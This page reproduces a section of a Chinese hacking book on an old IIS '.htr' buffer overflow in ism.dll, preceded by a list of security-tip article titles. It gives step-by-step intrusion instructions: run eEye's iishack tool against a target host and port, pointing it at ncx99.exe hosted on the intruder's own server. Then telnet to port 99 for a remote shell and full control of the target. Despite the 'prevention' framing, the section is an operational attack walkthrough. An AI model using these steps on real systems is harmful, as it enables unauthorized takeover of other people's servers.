当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客攻防技术内幕-防止入侵的方法(9)

安全基础
十大高招教会你摆脱黑客的网络攻击
2007个人计算计安全配置手册---武装到牙齿
【安全防护】网络入侵检测初步探测方法
保护系统 从防范IP泄漏开始!
教你如何防止系统中IE被恶意修改
交换机路由器更加安全三种办法
网络的核心所在 交换机漏洞五宗罪
上网必看,8招让你安全高效上网
提醒 网络玩家成为黑客攻击主要对象
十一种常见流氓软件完全卸载方法
聊天的危险 即时通讯常见安全问题
保护系统从防范IP泄漏开始
动态嵌入式DLL木马简便发现与清除方法
更新换代Vista系统安全新特性全面阐述
不可不留神 病毒损坏硬件有七大损招
注册表探秘 跟踪病毒的映象劫持的危害
追根溯源DLL技术木马进程内幕大揭密
擦亮眼睛小心假冒卡巴斯基的陷阱
简单安全习惯减少电脑资料丢失损坏几率
避免自己的服务器被列入黑名单的小技巧

安全基础 中的 黑客攻防技术内幕-防止入侵的方法(9)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 111 ::
收藏到网摘: n/a

6.6 htr溢出入侵

    

6.6  htr溢出入侵

IISInetsrv目录下,有个DLL文件叫ism.dll,这个模块在Web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现。IIShack.asm利用这个漏洞,eEye写了两个程序:iishack.exencx99.exe

在命令提示符下运行iishack程序,如图6-60所示。

6-60  iishack运行界面

命令行运行格式:

iishack 目标主机 端口URL(ncx99链接路径)

入侵者必须自己有一个空间,把ncx99.exe上传到该空间下,比如入侵者将ncx99.exe上传的路径是:61.129.81.122/ls-net/ncx99.exe,而对方的IIS serversh.kill.com.cn,则输入如下内容:

iishack sh.kill.com.cn 80 61.129.81.122/ls-net/ncx99.exe

如图6-61所示。

注意:

在输入ncx99.exe路径时不带http://

6-61  htr溢出

接着在提示符下输入:telnet sh.kill.com.cn 99即可通过99号端口登录到对方服务器。这样,入侵者就可以完全控制目标计算机。